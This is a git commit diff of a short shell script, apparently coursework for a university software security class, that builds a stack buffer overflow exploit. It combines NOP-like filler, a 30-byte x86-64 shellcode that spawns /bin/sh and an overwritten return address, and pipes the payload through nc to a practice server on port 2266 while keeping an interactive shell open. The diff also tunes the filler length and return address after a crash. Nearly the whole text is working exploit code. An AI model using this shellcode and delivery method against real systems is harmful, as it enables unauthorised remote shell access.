-# Buffer is 104 bytes
-# Shell code is 30 bytes so we need to fill 73 bytes
-# Then we need to skip the sfp and fix the return address to our address
-
-#fillers=$(printf "%73s")
-#fillers="a\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
-fillers="\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f\x0f\x1f"
shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
-sfpfiller="\x01\x01\x01\x01\x01\x01"
-# Return value is
-# 0x7ffff7dd8de0 - 73 = 7ffff7dd8e29 -
-# The buffer
-returnvalue="\x7f\xff\xf7\xdd\xeb\x30"
-cat <(echo -e "${fillers}${shellcode}${sfpfiller}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
+
+#Illegal instruction
+returnvalue="\x7f\xff\xf7\xff\xeb\x30"
+fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g')
+
+returnvalue="\x7f\xff\xf7\xff\xeb\x30"
+fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g')
+
+
+cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
repositories / sws1-1415.git / commitdiff